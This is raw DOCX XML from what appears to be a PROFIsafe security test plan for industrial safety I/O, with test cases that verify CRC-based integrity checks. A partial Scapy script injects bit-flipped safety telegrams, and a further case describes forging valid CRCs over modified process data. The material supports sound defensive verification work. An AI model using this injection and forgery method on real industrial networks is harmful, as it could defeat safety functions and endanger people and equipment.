          <w:p w14:paraId="51175FA8"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F_iPar_CRC (Properties &gt; PROFIsafe &gt; F-Parameters &gt; F_iPar_CRC) WITHOUT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08BD9A82" w14:textId="77777777"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recalculating it via the ifm-CRC-Tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDD24F9" w14:textId="09215A90" w:rsidR="002F4BB2" w:rsidRPr="006D5B99" w:rsidRDefault="002F4BB2" w:rsidP="002F4B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Compile  and download again; observe the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220098F1" w14:textId="7AE043B0" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="002F4BB2" w:rsidP="002F4B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connection-establishment behaviour in Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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5AF98C61" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="002F4BB2" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E8568DB" w14:textId="549DDCB8" w:rsidR="007428FB"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the configuration with the incorrect iParCRC/F_ParCRC is rejected (EC3), the device remains in Parametrization, qualifier stays bad. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D63B39B" w14:textId="6FA6D6A5" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="008D3BB7"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TIA diagnostic message / rejection code (screenshot).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="438DB544" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223E1F18" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C83F33E" w14:textId="1990C0F4" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="00CD7D37" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ002-0</w:t>
      </w:r>
      <w:r w:rsidR="00622ADE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00DA4F64" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stale Integrity-Value Fault Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC759D3" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CDB92F" w14:textId="0069970D" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 1</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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6D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC52A33" w14:textId="77777777" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B4A7F19" w14:textId="2507D5E6" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2169AC68" w14:textId="77777777" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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3D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78378039" w14:textId="3B7AA0B3" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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DA4F64" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612CDF0B" w14:textId="5350431E" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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the effectiveness of the transmission integrity-check countermeasure by modifying payload while leaving the integrity value stale, producing a detectable mismatch that resolves to passivation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6062055B"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cyclic safety traffic.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7461A4" w14:textId="77777777" w:rsidR="00AC5E59"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Modify a payload field while leaving the integrity value unchanged.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59FB6C63" w14:textId="2AD2992F" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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detection and the resulting device state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="003D5DC3" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A0B9224" w14:textId="53CD36AB" w:rsidR="00AC5E59"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the mismatch is detected and the device passivates (outputs de-</w:t>
            </w:r>
            <w:r w:rsidR="00270748" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>energized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, qualifier bad) or continues on legitimate traffic without acting on the corrupted data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27399609" w14:textId="393DFC79" w:rsidR="003D5DC3" w:rsidRPr="006D5B99"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modified payload is acted upon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4594B0AA" w14:textId="77777777" w:rsidR="003D5DC3" w:rsidRPr="006D5B99" w:rsidRDefault="003D5DC3" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCE04B1" w14:textId="77777777" w:rsidR="003D5DC3" w:rsidRPr="006D5B99" w:rsidRDefault="003D5DC3" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2EE268" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="005D11F1" w:rsidP="005D11F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6D5B99"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6D5B99" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7596D633" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="006D5B99"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D11F1" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0CD3AB" w14:textId="37FAEF19" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="00382682"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622ADE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3FDE" w:rsidRPr="006D5B99"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AB3FDE" w:rsidRPr="006D5B99" w:rsidRDefault="00AB3FDE" w:rsidP="00AB3FDE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1712BF30" w14:textId="3E911969" w:rsidR="00AB3FDE" w:rsidRPr="006D5B99" w:rsidRDefault="00AB3FDE" w:rsidP="00AB3FDE">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baseline capture via NV2</w:t>
            </w:r>
            <w:r w:rsidR="00980F5C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">injection via NV1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3FDE" w:rsidRPr="006D5B99"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AB3FDE" w:rsidRPr="006D5B99" w:rsidRDefault="00AB3FDE" w:rsidP="00AB3FDE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C66D8A4" w14:textId="034CA43C" w:rsidR="00AB3FDE" w:rsidRPr="006D5B99" w:rsidRDefault="001641F1" w:rsidP="00AB3FDE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1970"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>Wireshark/tshark, Scapy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00936625" w:rsidRPr="006D5B99"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936625" w:rsidRPr="006D5B99" w:rsidRDefault="00936625" w:rsidP="00936625">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DEB6D8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capture of one PROFIsafe cyclic telegram (as in TC-RQ001-03,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD7016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1-5), identify the byte offset of the process-data field (e.g.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025CDEF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digital-output channel bits) and of the 4-byte CRC field.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE1DBB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Build cm_rq002-02_inject.py:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56B76B67"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cm_rq002-02_inject.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A0306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E8F8C"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585F8C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   # &lt;- SRIO MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA5BB24"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p>
          <w:p w14:paraId="24092D8B"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take a captured legitimate payload, flip one bit in the process-data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2502B1"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field, but leave the CRC bytes UNCHANGED (stale CRC)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E507EF"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 = bytearray.fromhex("REPLACE_WITH_CAPTURED_PAYLOAD_HEX")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026E282E"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payload[&lt;PD_BYTE_OFFSET&gt;] ^= 0x01   # flip one bit in the process-data byte</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570823B5"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type=0x8892)/Raw(load=bytes(payload)),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4EBD08"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count=5, inter=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB6CA6D"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48808E70"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cm_rq002-02_inject.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E54C89" w14:textId="77777777" w:rsidR="00936625" w:rsidRPr="006D5B99" w:rsidRDefault="00936625" w:rsidP="00936625">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TIA watch table (Qualifier, outputs) and Wireshark for the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FA9248" w14:textId="25B5E230" w:rsidR="00936625" w:rsidRPr="006D5B99" w:rsidRDefault="00936625" w:rsidP="00936625">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device's reaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00936625" w:rsidRPr="006D5B99"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936625" w:rsidRPr="006D5B99" w:rsidRDefault="00936625" w:rsidP="00936625">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA07869" w14:textId="77777777" w:rsidR="00852508"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PASS</w:t>
            </w:r>
            <w:r w:rsidR="00852508" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the CRC mismatch is detected, telegram discarded or passivation triggered; no reaction to the manipulated process data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559B2ABC" w14:textId="1A29AB61" w:rsidR="00936625" w:rsidRPr="006D5B99" w:rsidRDefault="00936625" w:rsidP="00936625">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PCAP showing the mismatch, TIA diagnostics excerpt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B96FD7" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9B8985" w14:textId="29AB8799" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824B70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ002-0</w:t>
      </w:r>
      <w:r w:rsidR="004A53CE" w:rsidRPr="00824B70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00824B70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00F77210" w:rsidRPr="00824B70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Valid-Integrity-Value Injection over Modified Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7928D"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150EB169"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036C3E32" w14:textId="27F0A1F3"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CR 3.1 (+RE1) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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4B432EEE" w14:textId="3D90572A" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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7F6776EB" w14:textId="21B49587" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10DB42D7" w14:textId="19B4F948" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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the central residual risk: because the transmission integrity value is a non-secret checksum</w:t>
            </w:r>
            <w:r w:rsidR="00715C3C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">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6D5B99"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5E1B3A25"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a legitimate telegram and extract the parameters needed to reproduce the integrity value.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55928178"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Modify the process data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707DC53D" w14:textId="77777777" w:rsidR="00C62772"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a valid integrity value over the modified data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73DB93F4" w14:textId="24049D8A" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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Inject and observe the qualifier and outputs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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69941036" w14:textId="3855F4B4"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1D32731C" w14:textId="77777777" w:rsidR="00E07162"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recomputed-integrity telegram is accepted, confirming that authenticity depends on the black channel (residual risk documented). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0707F083" w14:textId="54996E89" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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 positive finding (rejection) would indicate an undocumented cryptographic authenticity control and must be investigated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="308EA90B" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF7E043"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424BFBA4"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04A561C" w14:textId="0DDB9C25"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w:t>
            </w:r>
            <w:r w:rsidR="001606CE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD26D7" w:rsidRPr="006D5B99"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BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118E7E52" w14:textId="34ECCBF0" w:rsidR="00BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D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NV3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
